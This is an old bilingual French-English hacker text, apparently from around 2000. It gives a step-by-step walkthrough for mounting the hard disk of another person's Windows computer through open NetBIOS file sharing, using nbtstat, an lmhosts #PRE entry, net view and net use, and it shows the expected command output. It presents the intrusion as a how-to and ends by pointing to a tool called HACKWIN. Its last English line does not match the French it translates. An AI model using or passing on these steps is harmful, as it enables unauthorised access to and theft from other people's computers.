|
Comment accéder à distance sur le disque dur d'un ordinateur: [How to access from a distance the hard disk of a computer] [Translated to English Jan.2000 by The Fixer] Il faut pour ça, que dans la configuration réseau de l'ordinateur auquel vous voulez accéder, ai sélectionné "Client pour les réseaux microsoft" et "Partage des fichiers" (Démarrez/panneau de configuration/Réseau). [It is necessary that the cofiguration of the computer you want to access has "Microsoft Networking Client" and "File and Print Sharing" selected.] Ouvrez une fenêtre MS-DOS, tapez ensuite la commande suivante: [Open a DOS Window and type the following command] nbtstat -A ip de l'ordinateur [nbtstat -a {ip address}] Vous allez voir apparaître: [You'll see the following:] NetBios Remote Machine Name Table Name Type status result <20> UNIQUE Registered ccccc <00> GROUP Registered MAC Adress = 48-54-32-12-00-21 Seule la ligne "result <20> UNIQUE Registered" nous intéresse, vous savez maintenant que "result" est le nom de l'ordinateur distant (les noms et les numéros ne sont que des exemples destinés à illustrer la manip). [Only the line "result <20> UNIQUE Registered" is of interest to us. You now know that "result" is the name of the remote computer (the names and numbers here are just illustrative examples). {Note from Fixer: If the number <20> does not appear then the remote machine does not have file sharing turned on and this won't work.}] tapez la commande: [type the command:] edit lmhosts vous êtes dans l'éditeur dos, là vous tapez : [you're in the DOS editor, in there type:] ip de l'ordinateur "result" #PRE [the ip of the computer "result" #PRE] Sauvez et quittez l'éditeur, de retour sur Dos tapez : [save the file and quit the editor, on return to DOS type:] nbtstat -R vous obtenez: [you should get:] Successful purge and preload of the NBT Remote Cache Name Table. Tapez: [type:] net view *\\result ressources partagées à \\result [Shared resources on \\result] Nom de partage Type Commentaire [Sharename Type Comment] ------------------------------------------------------ C Disque [C Disk] Exécution achevée. [The command was completed successfully] Placez vous dans le répertoire Windows (cd \windows) et tapez: [Change to the Windows directoy (cd \windows) and type:] net use * \\result\c [you then see something like:] M: connecté à \\result\c [M: connected to \\result\c Vous êtes maintenant sur le disque dur de l'ordinateur distant, vous pouvez, soit continuer sur MS-DOS ou retourner sous Windows, dans ce dernier cas, pour retrouver l'ordinateur distant, faites Démarrer/rechercher/ordinateur et tapez \\result notez bien le chemin donné. [You are now in the the hard disk of the remote computer, you can either continue in DOS or return to Windows. In the latter case, to re-access the remote computer, click Start/Find/Computer and then type \\result, noting the path given.] Allez ensuite dans l'explorateur et dans le menu Options/connecter un lecteur réseau tapez la chemin d'accès à l'ordinateur. windows vous affectes un lecteur (E par exemple) qui corresponds au disque dur de l'ordinateur distant. [Next go to the Explorer and in the menu Tools/Map Network Drive type the path to access the computer. {Note from Fixer: if you already did the NET USE command above, this is not necessary as the remote drive already has a drive letter you can access from "My Computer"} Windows will create a drive (E for example) thaat corresponds to the remote computer.] Pour ceux qui n'on rien compris ou qui n'y arrivent pas voici un petit programme qui se chargera de la procédure: HACKWIN [For those who can't find a vulnerable computer, a little program called HACKWIN will ease the procedure.]